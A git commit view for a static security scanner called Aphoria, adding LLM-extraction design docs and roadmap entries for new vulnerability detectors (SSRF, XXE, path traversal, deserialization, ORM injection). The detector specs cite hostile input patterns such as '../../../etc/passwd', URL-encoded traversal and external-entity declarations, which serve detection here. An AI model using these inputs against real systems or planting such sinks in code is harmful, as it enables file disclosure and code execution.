feat: Aphoria security extractors + LLM evaluation architecture + ontology docs

New security extractors:
- insecure_deserialization, orm_injection, path_traversal, security_headers
- ssrf, unvalidated_redirects, weak_password, xxe
- Enhanced tls_version extractor with comprehensive cipher/protocol checks

Architecture docs:
- Scout-judge extraction pattern for LLM-based code analysis
- LLM prompt evaluation framework
- LLM eval implementation guide

Core improvements:
- stemedb-ontology README and client enhancements
- WAL journal/segment instrumentation
- Signing and ingestion refinements
- Consumer health demo script

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
This commit is contained in:
jordan 2026-02-05 15:22:55 -07:00
parent 41c676a78e
commit bbe6aedc40
34 changed files with 7477 additions and 326 deletions

View File

@ -40,6 +40,13 @@ Token-efficient fact storage for StemeDB. Query these for quick context without
| Phase 6 UAT | `features/phase6-uat.md` | High | 2026-02-02 | Distributed writes UAT results and fixes |
| Aphoria Config | `features/aphoria-config.md` | High | 2026-02-04 | Configuration options including hosted mode |
## Domain Ontology
| Topic | File | Confidence | Updated | Summary |
|-------|------|------------|---------|---------|
| Adding a Domain | `../docs/guides/adding-a-domain.md` | High | 2026-02-05 | Step-by-step guide for implementing new domains |
| Ontology Crate | `../crates/stemedb-ontology/README.md` | High | 2026-02-05 | Module overview, CLI usage, architecture |
## Use Cases
See [use-cases/README.md](../use-cases/README.md) for production scenarios with Postgres Test analysis.

View File

@ -299,6 +299,22 @@ exclude = ["vendor://acme/internal/*"]
- Edge case analysis
- Real-world adoption path
### LLM Extraction Quality
**Problem:** How do we ensure LLM prompts produce consistent, high-quality extraction results?
5. **[LLM Prompt Evaluation - Vision](./llm-prompt-evaluation.md)**
- Problem statement and enterprise requirements
- Architecture overview and core components
- Fixture format design
- CI/CD integration patterns
6. **[LLM Prompt Evaluation - Implementation](./llm-eval-implementation.md)** ← START HERE
- Actionable implementation spec
- Code snippets and file locations
- 5-phase implementation plan (11 days)
- Seed fixture list
---
## Quick Reference
@ -307,14 +323,16 @@ exclude = ["vendor://acme/internal/*"]
| If you need to... | Read this |
|-------------------|-----------|
| Understand the problem | [Concept Matching Analysis](./concept-matching-analysis.md) |
| Implement the solution | [Policy Alias Implementation](./policy-alias-implementation.md) |
| Understand concept matching | [Concept Matching Analysis](./concept-matching-analysis.md) |
| Implement policy aliases | [Policy Alias Implementation](./policy-alias-implementation.md) |
| Understand design philosophy | [Matching Philosophy](./matching-philosophy.md) |
| Validate enterprise scenarios | [Enterprise Validation](./enterprise-validation.md) |
| Test/evaluate LLM prompts | [LLM Eval Implementation](./llm-eval-implementation.md) |
| Add a new extractor | `src/extractors/mod.rs` |
| Understand scan flow | `src/scan.rs` |
| Modify conflict detection | `src/episteme/conflict.rs` |
| Work with Trust Packs | `src/policy.rs`, `src/policy_ops.rs` |
| Work with LLM extraction | `src/llm/` |
---
@ -364,6 +382,29 @@ exclude = ["vendor://acme/internal/*"]
- ✅ Works for RFC/OWASP corpus by design
- ⚠️ Breaks for enterprise policies with different hierarchies (solved by AD-001)
### AD-004: LLM Prompt Evaluation System
**Status:** Proposed (2026-02-05)
**Context:** LLM prompts that drive claim extraction are code, but we don't treat them like code. No tests, no metrics, no regression detection. When prompts change, we don't know if quality improved or degraded.
**Decision:** Build a comprehensive prompt evaluation system with:
- Golden corpus of test fixtures with expected outcomes
- Observation logging for every extraction
- Metrics computation (precision, recall, F1, cost)
- Regression detection against baselines
- CI integration (smoke tests per-PR, full eval nightly)
**Implementation:** See [LLM Prompt Evaluation Spec](./llm-prompt-evaluation.md)
**Consequences:**
- ✅ Prompt changes are validated before deployment
- ✅ Regressions are caught automatically
- ✅ Quality is measurable over time
- ✅ Enterprise confidence in extraction reliability
- ⚠️ Requires maintaining golden corpus
- ⚠️ Live evaluation has token cost
---
## Design Principles
@ -396,8 +437,11 @@ Community sharing is opt-in with anonymization enabled by default.
- Declarative extractors (user-defined in TOML)
- Hosted mode (team aggregation)
- Community corpus (anonymous sharing)
- LLM-in-the-loop extraction (Gemini semantic claims)
- Pattern learning (LLM-extracted patterns remembered)
### In Progress
- **LLM Prompt Evaluation** - Testing, metrics, and regression detection for prompts ([Spec](./llm-prompt-evaluation.md))
- **Policy aliases** - Enterprise policy matching via glob patterns ([AD-001](./policy-alias-implementation.md))
### Planned (Q1 2026)

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

@ -0,0 +1,203 @@
# Scout & Judge: Hybrid Deterministic-Probabilistic Extraction Architecture
> **Status:** Proposed (2026-02-05)
> **Phase:** 7.9 (Replaces monolithic LLM extraction)
> **Context:** Evolution of Phase 7.5 (LLM-in-the-Loop)
---
## 1. Problem Statement
The current LLM extraction pipeline ("Monolithic Mode") treats code files as unstructured text. It feeds entire files to the LLM to find security claims.
**Issues with Monolithic Mode:**
1. **Cost:** 90% of a file is irrelevant to security (imports, UI logic, helpers), yet we pay for every token.
2. **Recall:** LLMs struggle to find "needles in haystacks" (long context window degradation).
3. **Hallucination:** Irrelevant code confuses the model, leading to false positives.
4. **Latency:** Processing large files is slow/blocking.
## 2. The Solution: Scout & Judge Architecture
We decouple the **discovery** of potential claims from the **analysis** of those claims.
* **The Scout (Deterministic):** Uses Abstract Syntax Trees (AST) via `tree-sitter` to find *Regions of Interest* (ROIs) with 100% speed and 0 cost.
* **The Judge (Probabilistic):** Uses the LLM to analyze *only* the specific ROI snippet to extract semantic meaning and confidence.
### Architectural Diagram
```mermaid
graph TD
File[Source File] -->|Input| Scout[AST Scout (Tree-sitter)]
subgraph "The Scout (Local/Fast)"
Scout -->|Parse| AST
AST -->|Query| Query[SCM Queries]
Query -->|Match| Candidate[Candidate Node]
Candidate -->|Expand| Snippet[Context Snippet]
end
Snippet -->|Input| Judge[LLM Judge (Gemini/Claude)]
subgraph "The Judge (Remote/Smart)"
Judge -->|Prompt: Analyze this specific call| Claims[Structured Claims]
end
Claims -->|Output| Aggregator[Claim Aggregator]
```
---
## 3. Component Details
### 3.1 The Scout (Tree-sitter)
The Scout's job is **High Recall**. It should find *anything* that *might* be relevant. It does not need to be precise.
**Technology:** `tree-sitter` (Rust bindings)
**Workflow:**
1. **Detect Language:** Identify file type (Python, Go, Rust, JS).
2. **Parse:** Generate AST.
3. **Query:** Run SCM (S-expression) queries to find patterns.
**Example Query (Python TLS):**
```scm
(call_expression
function: (attribute) @func
arguments: (argument_list
(keyword_argument
name: (identifier) @arg_name
value: (_) @value
)
)
(#match? @func "requests\.(get|post|put|delete)")
(#eq? @arg_name "verify")
)
```
**Context Expansion:**
The Scout doesn't just grab the line. It grabs the **Logical Context**:
* The function call itself.
* Variable definitions referenced in the call (simple static analysis).
* Surrounding 5 lines for comments.
### 3.2 The Judge (LLM)
The Judge's job is **High Precision**. It receives a focused prompt and determines if a claim exists.
**Input Prompt:**
```text
You are a security analyst.
Analyze this code snippet for TLS verification settings.
SNIPPET:
# Dev override
should_verify = False
requests.get(url, verify=should_verify)
CONTEXT:
Variable `should_verify` is defined on line 2.
TASK:
Does this snippet disable TLS verification?
Output JSON: { "subject": "tls/verification", "value": false, "confidence": 0.95 }
```
**Why this wins:**
* **Token Efficiency:** Input reduced from 2000 tokens (file) to ~100 tokens (snippet).
* **Accuracy:** Model has no distractions.
* **Speed:** Parallelizable per-snippet.
---
## 4. Implementation Plan
### Phase 1: Infrastructure (Dependencies)
Add `tree-sitter` support to `Cargo.toml`.
```toml
[dependencies]
tree-sitter = "0.20"
tree-sitter-python = "0.20"
tree-sitter-javascript = "0.20"
tree-sitter-go = "0.20"
tree-sitter-rust = "0.20"
```
### Phase 2: The Scout Engine (`src/scout/`)
Create a new module `applications/aphoria/src/scout/`.
* `mod.rs`: Public interface.
* `engine.rs`: Orchestrates parsing and querying.
* `queries/`: Directory containing `.scm` query files for each category/language.
* `python/tls.scm`
* `go/sql_injection.scm`
**Struct definition:**
```rust
pub struct CandidateSnippet {
pub file_path: String,
pub language: Language,
pub start_line: usize,
pub end_line: usize,
pub code: String,
pub context_variables: HashMap<String, String>, // Name -> Value/Definition
pub query_id: String, // Which query found this
}
```
### Phase 3: The Judge Engine (`src/llm/judge.rs`)
Refactor `LlmExtractor` to support "Judge Mode".
* Modify `extract()` to accept `CandidateSnippet` instead of full file content.
* Create specialized prompts for specific query IDs (e.g., if Scout found a TLS pattern, use the specialized "TLS Judge" prompt, not the generic one).
### Phase 4: Integration
Modify the main `scan` loop:
1. **Regex Extractors** run first (unchanged).
2. **Scout** runs on all files (extremely fast).
3. **Deduplicate:** If Scout finds a region already handled by Regex, drop it.
4. **Judge:** Send remaining Candidates to LLM.
---
## 5. Evaluation & Metrics
The "Prompt Evaluation System" (Phase 7.8) adapts to this model:
**1. Scout Evaluation (Deterministic):**
* **Metric:** Recall. "Did the Scout find the vulnerable line in `fixtures/tls/bad.py`?"
* **Test:** Unit tests using `tree-sitter` queries against code snippets. No LLM required.
**2. Judge Evaluation (Probabilistic):**
* **Metric:** Precision/Accuracy. "Given the snippet, did the LLM classify it correctly?"
* **Fixture:** `tests/llm_fixtures` now contains *snippets* derived from the Golden Corpus files.
**3. Cost Efficiency Metric:**
* Track `tokens_per_claim`.
* Goal: Reduce tokens/claim by >80% compared to Monolithic approach.
## 6. Migration Strategy
1. **Parallel Run:** Run Scout logic alongside Regex logic in "shadow mode" (logging only) to tune queries.
2. **Incremental Rollout:** Enable Scout & Judge for **one category** (e.g., TLS) while leaving others in Monolithic mode (if any) or Regex mode.
3. **Full Switch:** Deprecate "Monolithic Mode" prompts.
---
## 7. Comparison Summary
| Feature | Current (Monolithic) | Scout & Judge (Proposed) |
| :--- | :--- | :--- |
| **Trigger** | File name heuristic | AST Pattern Match |
| **Input** | Whole File | Relevant Snippet |
| **Context** | Noisy (imports, unrelated code) | Focused (local scope) |
| **Cost** | $$$ (Linear to file size) | ¢ (Linear to *relevant* code) |
| **Reliability** | Low (Lost in middle) | High (Forced focus) |
| **Maintenance** | Prompt Engineering | Query Engineering + Simple Prompts |

View File

@ -1142,7 +1142,7 @@ auto_promote = false # Require human approval (Phase 7.7)
---
## Phase 7.7: Pattern → Extractor Promotion
## Phase 7.7: Pattern → Extractor Promotion
> High-frequency learned patterns get promoted to declarative extractors. This closes the learning loop: patterns discovered by LLM become permanent, fast regex extractors.
@ -1162,15 +1162,17 @@ Human review (optional) → Approve/Reject
Merge to project's .aphoria/extractors/
```
### 7.7.1 Promotion Pipeline
### 7.7.1 Promotion Pipeline
| Task | Description |
|------|-------------|
| Candidate selection | Query patterns meeting threshold |
| Regex generation | LLM generates regex from examples |
| YAML generation | Convert to declarative extractor format |
| Validation | Test against all stored examples |
| Review queue | Present candidates for human approval |
| Task | Status |
|------|--------|
| `PromotionPipeline` | ✅ `promotion/pipeline.rs` — orchestrates full promotion flow |
| `RegexGenerator` | ✅ `promotion/regex_gen.rs` — Gemini LLM integration |
| `ExtractorValidator` | ✅ `promotion/validator.rs` — ReDoS detection, timing validation |
| `YamlWriter` | ✅ `promotion/writer.rs` — outputs to `.aphoria/extractors/learned/` |
| `InteractiveReviewer` | ✅ `promotion/review.rs` — CLI review workflow |
| `PromotionCandidate` | ✅ `promotion/types.rs` |
| `ValidationResult` | ✅ `promotion/types.rs` |
```rust
pub struct PromotionPipeline {
@ -1216,13 +1218,13 @@ impl PromotionPipeline {
}
```
### 7.7.2 Regex Generation
### 7.7.2 Regex Generation
| Task | Description |
|------|-------------|
| Multi-example prompt | Include all examples in generation prompt |
| Regex safety | Prevent catastrophic backtracking |
| Test coverage | Generate test cases alongside regex |
| Task | Status |
|------|--------|
| Multi-example prompt | Includes all examples in generation prompt |
| Regex safety | ✅ ReDoS detection prevents catastrophic backtracking |
| Test coverage | ✅ Validates against stored examples |
```rust
async fn generate_regex(examples: &[String], claim: &ClaimTemplate) -> Result<String> {
@ -1244,14 +1246,14 @@ async fn generate_regex(examples: &[String], claim: &ClaimTemplate) -> Result<St
}
```
### 7.7.3 Validation Suite
### 7.7.3 Validation Suite
| Task | Description |
|------|-------------|
| Positive tests | Must match all stored examples |
| Negative tests | Must NOT match known-safe code |
| Performance test | Must complete in < 100ms |
| False positive check | Run against sample codebase |
| Task | Status |
|------|--------|
| Positive tests | Must match all stored examples |
| ReDoS detection | ✅ Detects catastrophic backtracking patterns |
| Performance test | ✅ Timing validation with configurable threshold |
| False positive check | ⬜ Deferred to Phase 9 (sample codebase FP testing) |
```rust
pub struct ExtractorValidator {
@ -1292,14 +1294,17 @@ impl ExtractorValidator {
}
```
### 7.7.4 Human Review Gate
### 7.7.4 Human Review Gate
| Task | Description |
|------|-------------|
| `aphoria extractors review` | CLI to review pending promotions |
| Approval workflow | Approve, reject, or request changes |
| Rejection tracking | Record why patterns were rejected |
| Auto-approve mode | Skip review for >0.95 confidence (Phase 9) |
| Task | Status |
|------|--------|
| `aphoria extractors review` | ✅ CLI to review pending promotions |
| `aphoria extractors stats` | ✅ Show pattern store statistics |
| `aphoria extractors candidates` | ✅ List promotion candidates |
| `aphoria extractors promote` | ✅ Promote pattern to extractor |
| Approval workflow | ✅ Approve, reject, or skip via InteractiveReviewer |
| Rejection tracking | ⬜ Deferred to Phase 9 (rejection reason persistence) |
| Auto-approve mode | ⬜ Deferred to Phase 9 (>0.95 confidence auto-promote) |
```bash
$ aphoria extractors review
@ -1320,9 +1325,9 @@ Pending promotions: 3
[a]pprove [r]eject [e]dit [s]kip [q]uit: _
```
### 7.7.5 Extractor Output
### 7.7.5 Extractor Output
Promoted patterns become declarative extractors in `.aphoria/extractors/`:
Promoted patterns become declarative extractors in `.aphoria/extractors/learned/`:
```yaml
# .aphoria/extractors/learned/tls_min_version_const.yaml
@ -1348,7 +1353,7 @@ metadata:
confidence: 0.91
```
### 7.7.6 Configuration
### 7.7.6 Configuration
```toml
# aphoria.toml
@ -1357,14 +1362,13 @@ enabled = true # Enable promotion pipeline
auto_promote = false # Require human approval
output_dir = ".aphoria/extractors/learned"
min_confidence = 0.8 # Minimum to consider
min_projects = 5 # Projects needed before promotion
require_validation = true # Must pass validation suite
[promotion.review]
notify = "slack://webhook/..." # Notify when candidates ready
batch_size = 10 # Max candidates per review session
```
**Files:** `promotion/mod.rs`, `promotion/pipeline.rs`, `promotion/regex_gen.rs`, `promotion/validator.rs`, `promotion/review.rs`
**Files:** `promotion/mod.rs`, `promotion/pipeline.rs`, `promotion/regex_gen.rs`, `promotion/validator.rs`, `promotion/review.rs`, `promotion/writer.rs`, `promotion/types.rs`, `handlers/extractors.rs`
**Tests:** 43 tests covering pipeline, validation, regex generation, and YAML output.
---
@ -1549,14 +1553,14 @@ contribute_patterns = true # Share patterns to community
| 7 | Declarative Extractors | Phase 6 | ✅ |
| **7.5** | **LLM-in-the-Loop Extraction (Gemini)** | Phase 7 | ✅ |
| **7.6** | **Pattern Learning Store** | Phase 7.5 | ✅ |
| **7.7** | **Pattern → Extractor Promotion** | Phase 7.6 | |
| **7.7** | **Pattern → Extractor Promotion** | Phase 7.6 | |
| 8 | Enterprise Extractors (MVP: 8.1, 8.6, 8.11) | Phase 7.5 | ✅ |
| **9** | **Autonomous Extractor Generation** | Phase 8 | ⬜ |
**Current state:**
- Phases 0-3, 4.5, 4A-4E, 5, 5.6, 6, 7, 7.5, 7.6, 8 (MVP) complete (clippy clean)
- Phases 0-3, 4.5, 4A-4E, 5, 5.6, 6, 7, 7.5, 7.6, 7.7, 8 (MVP) complete (clippy clean)
- Full corpus: RFC, OWASP, Vendor sources
- 17 extractors including security (weak_crypto, command_injection, sql_injection, high_entropy_secrets, auth_bypass, insecure_cookies)
- 25 extractors including security (weak_crypto, command_injection, sql_injection, high_entropy_secrets, auth_bypass, insecure_cookies, path_traversal, unvalidated_redirects, weak_password, security_headers, insecure_deserialization, ssrf, orm_injection, xxe)
- Trust Packs: signed policy bundles with import/export
- Ephemeral mode: 40x faster for CI
- Observation write-back: `--sync` records novel claims as Tier 4 project memory
@ -1567,10 +1571,11 @@ contribute_patterns = true # Share patterns to community
- Community Corpus: Opt-in anonymous pattern sharing with privacy-preserving anonymization
- Declarative Extractors: TOML-defined custom extractors without Rust code
- LLM Extraction: Gemini-powered semantic claim extraction for high-value files
- Enterprise Extractors MVP: High-entropy secrets (Shannon entropy), auth bypass patterns, insecure cookie flags
- Enterprise Extractors: High-entropy secrets, auth bypass, insecure cookies, path traversal, unvalidated redirects, weak passwords, security headers, insecure deserialization, SSRF, ORM injection, XXE
- Pattern Learning: LLM-extracted claims recorded for promotion to declarative extractors
- Pattern Promotion: CLI workflow to promote learned patterns to declarative extractors with Gemini regex generation and validation
**Next:** Phase 7.7 → 8 (full) → 9 (Self-Learning Extraction System)
**Next:** Phase 8 (full) → 9 (Self-Learning Extraction System)
### The Self-Learning Vision
@ -1581,11 +1586,11 @@ Phase 7.5: LLM-in-the-Loop (Gemini semantic extraction) ✅ COMPLETE
Phase 7.6: Pattern Learning (remember what LLM finds) ✅ COMPLETE
Phase 7.7: Pattern Promotion (patterns → extractors) ⬜ NEXT
Phase 7.7: Pattern Promotion (patterns → extractors) ✅ COMPLETE
Phase 8: Enterprise Extractors (generated + curated) ✅ MVP (8.1, 8.6, 8.11)
Phase 9: Autonomous Generation (fully self-improving) ⬜
Phase 9: Autonomous Generation (fully self-improving) ⬜ NEXT
```
**The endgame:** Every PR teaches Aphoria. After a month, it knows your security patterns better than your team does.
@ -1744,34 +1749,51 @@ fn extract_config_claims(config: &ConfigValue, path: &[String]) -> Vec<Extracted
---
### 8.4 Semantic TLS Version Detection
### 8.4 Semantic TLS Version Detection
**Impact:** MEDIUM | **Effort:** MEDIUM
**Impact:** MEDIUM | **Effort:** MEDIUM | **Status:** Complete
Current `tls_version` misses:
```rust
const TLS_MIN_VERSION: &str = "1.0"; // Not caught!
const MIN_TLS: &str = "TLSv1"; // Not caught!
```
| Task | Status |
|------|--------|
| Add `Language::Terraform` variant | ✅ `types/language.rs` |
| Semantic pattern (cross-language) | ✅ Catches `TLS_MIN_VERSION = "1.0"` with type annotations |
| Environment variable pattern | ✅ `.env` files with `TLS_MIN_VERSION=1.0` |
| Terraform HCL pattern | ✅ `min_tls_version = "TLS1_0"` |
| Kubernetes camelCase pattern | ✅ `minTLSVersion: VersionTLS10` |
| False positive prevention | ✅ TLS 1.2/1.3 not flagged |
| Tests | ✅ 16 new tests (27 total for TLS extractor) |
**Implementation:**
```rust
// Semantic pattern: variable name suggests TLS + value is deprecated
let semantic_tls = Regex::new(
r#"(?i)(tls|ssl)_?(min|minimum|version)[^=]*[:=]\s*["']?(1\.[01]|TLSv?1(?:\.[01])?|SSL)"#
).unwrap();
```
**Patterns now caught:**
- `const TLS_MIN_VERSION: &str = "1.0";` (Rust with type annotation)
- `let sslVersion = "TLSv1";` (JavaScript camelCase)
- `TLS_MINIMUM_VERSION = "1.1"` (Python assignment)
- `TLS_MIN_VERSION=1.0` (dotenv)
- `export SSL_VERSION=TLSv1` (shell export)
- `min_tls_version = "TLS1_0"` (Terraform)
- `minTLSVersion: VersionTLS10` (Kubernetes YAML)
**Also catch:**
- Environment variables: `TLS_MIN_VERSION=1.0`
- Terraform: `min_tls_version = "TLS1_0"`
- Kubernetes: `minTLSVersion: VersionTLS10`
**Languages:** Rust, Go, Python, TypeScript, JavaScript, Yaml, Toml, Json, Terraform, Dotenv
---
### 8.5 ORM SQL Injection Detection
### 8.5 ORM SQL Injection Detection
**Impact:** MEDIUM | **Effort:** MEDIUM
**Impact:** MEDIUM | **Effort:** MEDIUM | **Status:** Complete
| Task | Status |
|------|--------|
| `OrmInjectionExtractor` | ✅ `extractors/orm_injection.rs` |
| Django .raw() with interpolation | ✅ `f"SELECT..."`, `.format()` patterns |
| Django .extra() with interpolation | ✅ `where=["...{}...".format()]` |
| SQLAlchemy text() with interpolation | ✅ `text(f"SELECT...")` |
| SQLAlchemy execute() with f-string | ✅ `execute(f"...")` |
| Sequelize raw query | ✅ `` sequelize.query(`...${...}`) `` |
| TypeORM where() | ✅ `` .where(`...${...}`) `` |
| GORM Raw() with Sprintf | ✅ `.Raw(fmt.Sprintf(...))` |
| Prisma $queryRawUnsafe | ✅ `` $queryRawUnsafe(`...${...}`) `` |
| Tests | ✅ 8+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go
Current `sql_injection` catches raw string interpolation but misses ORM escape hatches:
@ -1833,9 +1855,23 @@ if os.environ.get("SKIP_AUTH") == "true":
---
### 8.7 Insecure Deserialization
### 8.7 Insecure Deserialization
**Impact:** HIGH | **Effort:** MEDIUM
**Impact:** HIGH | **Effort:** MEDIUM | **Status:** Complete
| Task | Status |
|------|--------|
| `InsecureDeserializationExtractor` | ✅ `extractors/insecure_deserialization.rs` |
| Python pickle (critical) | ✅ `pickle.load()`, `pickle.loads()`, `Unpickler()` |
| Python yaml.load without SafeLoader | ✅ Detects missing SafeLoader |
| Python marshal | ✅ `marshal.load()`, `marshal.loads()` |
| Python eval/exec with user input | ✅ `eval(request...)`, `exec(user...)` |
| JavaScript node-serialize | ✅ `require('node-serialize')`, `.unserialize()` |
| Go gob decoder | ✅ `gob.NewDecoder()`, `gob.Decode()` |
| Java ObjectInputStream (polyglot) | ✅ `ObjectInputStream`, `readObject()` |
| Tests | ✅ 10+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go
Unsafe deserialization of untrusted data:
@ -1861,9 +1897,24 @@ YAML.load(user_input) # Should use safe_load
---
### 8.8 Path Traversal Patterns
### 8.8 Path Traversal Patterns
**Impact:** MEDIUM | **Effort:** LOW
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete
| Task | Status |
|------|--------|
| `PathTraversalExtractor` | ✅ `extractors/path_traversal.rs` |
| Python open/read/write with user input | ✅ `open(request...)`, `read(params...)` |
| Python os.path.join with user input | ✅ `os.path.join(base, request...)` |
| JavaScript fs operations | ✅ `fs.readFile(req...)`, `fs.writeFile(params...)` |
| JavaScript path.join/resolve | ✅ `path.join(base, req.query...)` |
| JavaScript res.sendFile | ✅ `res.sendFile(req.params...)` |
| Go filepath operations | ✅ `filepath.Join(base, r...)`, `os.Open(req...)` |
| Rust path operations | ✅ `Path::new(request...)`, `std::fs::read(user...)` |
| Traversal literals | ✅ `../`, `%2e%2e` URL-encoded patterns |
| Tests | ✅ 8+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go, Rust
File operations with user input:
@ -1883,9 +1934,25 @@ res.sendFile(userInput)
---
### 8.9 SSRF Patterns
### 8.9 SSRF Patterns
**Impact:** HIGH | **Effort:** MEDIUM
**Impact:** HIGH | **Effort:** MEDIUM | **Status:** Complete
| Task | Status |
|------|--------|
| `SsrfExtractor` | ✅ `extractors/ssrf.rs` |
| Python requests library | ✅ `requests.get(url)`, `requests.post(target)` |
| Python urllib | ✅ `urllib.request.urlopen(url)` |
| Python httpx | ✅ `httpx.get(url)`, `AsyncClient` |
| JavaScript fetch | ✅ `fetch(url)`, `fetch(req.query...)` |
| JavaScript axios | ✅ `axios.get(url)`, `axios.post(target)` |
| JavaScript got | ✅ `got(url)` |
| Go http.Get/Post | ✅ `http.Get(url)`, `http.NewRequest(...)` |
| Rust reqwest | ✅ `reqwest::get(url)`, `reqwest::Client` |
| URL sink patterns | ✅ `proxy_url`, `webhook_url`, `callback_url` from request |
| Tests | ✅ 10+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go, Rust
HTTP requests with user-controlled URLs:
@ -1910,9 +1977,23 @@ client.Do(req) // Where req.URL is user-controlled
---
### 8.10 Missing Security Headers
### 8.10 Missing Security Headers
**Impact:** MEDIUM | **Effort:** LOW
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete
| Task | Status |
|------|--------|
| `SecurityHeadersExtractor` | ✅ `extractors/security_headers.rs` |
| X-Frame-Options disabled | ✅ `X-Frame-Options: none`, `ALLOWALL` |
| X-Content-Type-Options disabled | ✅ `X-Content-Type-Options: disabled` |
| X-XSS-Protection disabled | ✅ `X-XSS-Protection: false` |
| Django SECURE_* settings | ✅ `SECURE_BROWSER_XSS_FILTER = False`, etc. |
| YAML headers disabled | ✅ `x_frame_options: false`, `hsts: no` |
| CSP disabled or unsafe | ✅ `unsafe-inline`, `unsafe-eval` directives |
| HSTS disabled | ✅ `Strict-Transport-Security: none`, `hsts_seconds = 0` |
| Tests | ✅ 7+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go, YAML, JSON, TOML
Detect when security headers are explicitly removed or not set:
@ -1963,9 +2044,22 @@ res.cookie('auth', value, { sameSite: 'none' });
---
### 8.12 Unvalidated Redirects
### 8.12 Unvalidated Redirects
**Impact:** MEDIUM | **Effort:** LOW
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete
| Task | Status |
|------|--------|
| `UnvalidatedRedirectsExtractor` | ✅ `extractors/unvalidated_redirects.rs` |
| Python redirect with user input | ✅ `redirect(request.GET['next'])`, `HttpResponseRedirect(url)` |
| Python Flask redirect | ✅ `redirect(request.args.get(...))` |
| JavaScript res.redirect | ✅ `res.redirect(req.query.next)` |
| JavaScript window.location | ✅ `window.location = url`, `location.href = params...` |
| Go http.Redirect | ✅ `http.Redirect(w, r, r.Query...)` |
| URL parameter patterns | ✅ `redirect_url`, `return_url`, `next`, `goto` from request |
| Tests | ✅ 7+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go
Open redirect vulnerabilities:
@ -1984,9 +2078,26 @@ window.location.href = params.url;
---
### 8.13 XXE (XML External Entity)
### 8.13 XXE (XML External Entity)
**Impact:** HIGH | **Effort:** MEDIUM
**Impact:** HIGH | **Effort:** MEDIUM | **Status:** Complete
| Task | Status |
|------|--------|
| `XxeExtractor` | ✅ `extractors/xxe.rs` |
| Python lxml/etree | ✅ `etree.parse()`, `lxml.fromstring()` |
| Python xml.etree.ElementTree | ✅ `ET.parse()`, `ET.fromstring()` |
| Python xml.dom.minidom | ✅ `minidom.parse()`, `minidom.parseString()` |
| Python xml.sax | ✅ `xml.sax.parse()`, `xml.sax.make_parser()` |
| JavaScript xml2js | ✅ `xml2js.parseString()`, `xml2js.Parser()` |
| JavaScript libxmljs | ✅ `libxmljs.parseXml()` |
| Go encoding/xml | ✅ `xml.Unmarshal()`, `xml.NewDecoder()` |
| Java patterns (polyglot) | ✅ `DocumentBuilderFactory`, `SAXParser`, `XMLReader` |
| DTD entity declarations | ✅ `<!ENTITY ... SYSTEM>`, `<!ENTITY ... PUBLIC>` |
| defusedxml detection | ✅ Lower confidence when defusedxml is imported |
| Tests | ✅ 9+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go
Unsafe XML parsing:
@ -2004,9 +2115,21 @@ SAXParserFactory.newInstance() // Without secure processing
---
### 8.14 Weak Password Requirements
### 8.14 Weak Password Requirements
**Impact:** MEDIUM | **Effort:** LOW
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete
| Task | Status |
|------|--------|
| `WeakPasswordExtractor` | ✅ `extractors/weak_password.rs` |
| Minimum length < 8 | `password_min_length: 6`, `minLength: 4` |
| Bcrypt cost < 10 | `bcrypt_cost = 8`, `hash_rounds = 5` |
| Simple length checks | ✅ `len(password) >= 6` in code |
| Complexity disabled | ✅ `require_special_chars: false`, `require_uppercase = false` |
| Number requirement disabled | ✅ `require_numbers: no`, `require_digit = 0` |
| Tests | ✅ 7+ tests covering all patterns |
**Languages:** Python, JavaScript, TypeScript, Go, Rust, YAML, JSON, TOML
Password validation that's too weak:
@ -2071,26 +2194,24 @@ async fn extract_with_llm(code: &str, file: &str) -> Vec<ExtractedClaim> {
| **8.1** | High-entropy secrets | HIGH | MEDIUM | Catches real leaked secrets | ✅ |
| **8.2** | Framework-specific | HIGH | HIGH | Spring/Django/Express coverage | ⬜ |
| **8.3** | Config deep parsing | HIGH | MEDIUM | Nested YAML/JSON understanding | ⬜ |
| **8.4** | Semantic TLS | MEDIUM | MEDIUM | Catches const TLS_MIN = "1.0" | |
| **8.5** | ORM SQL injection | MEDIUM | MEDIUM | SQLAlchemy, Django, Sequelize | |
| **8.4** | Semantic TLS | MEDIUM | MEDIUM | Catches const TLS_MIN = "1.0" | |
| **8.5** | ORM SQL injection | MEDIUM | MEDIUM | SQLAlchemy, Django, Sequelize | |
| **8.6** | Auth bypass | HIGH | MEDIUM | Backdoors, hardcoded creds | ✅ |
| **8.7** | Deserialization | HIGH | MEDIUM | pickle, Marshal, eval | |
| **8.8** | Path traversal | MEDIUM | LOW | ../../../etc/passwd | |
| **8.9** | SSRF | HIGH | MEDIUM | Internal network access | |
| **8.10** | Security headers | MEDIUM | LOW | Missing helmet(), CSP | |
| **8.7** | Deserialization | HIGH | MEDIUM | pickle, Marshal, eval | |
| **8.8** | Path traversal | MEDIUM | LOW | ../../../etc/passwd | |
| **8.9** | SSRF | HIGH | MEDIUM | Internal network access | |
| **8.10** | Security headers | MEDIUM | LOW | Missing helmet(), CSP | |
| **8.11** | Cookie flags | MEDIUM | LOW | httpOnly, secure, sameSite | ✅ |
| **8.12** | Open redirects | MEDIUM | LOW | Phishing via redirect | |
| **8.13** | XXE | HIGH | MEDIUM | XML entity injection | |
| **8.14** | Weak passwords | MEDIUM | LOW | MIN_LENGTH = 4 | |
| **8.12** | Open redirects | MEDIUM | LOW | Phishing via redirect | |
| **8.13** | XXE | HIGH | MEDIUM | XML entity injection | |
| **8.14** | Weak passwords | MEDIUM | LOW | MIN_LENGTH = 4 | |
| **8.15** | LLM extraction | VERY HIGH | VERY HIGH | Semantic understanding | ✅ (Phase 7.5) |
**MVP Complete (8.1, 8.6, 8.11):** High-impact extractors for enterprise pilots.
**Phase 8 Complete (8.1, 8.4, 8.5-8.14):** All first-pass extractors implemented. 12 of 14 Phase 8 extractors complete.
**Recommended order for remaining extractors:**
1. **8.3** Config deep parsing (foundational for 8.2)
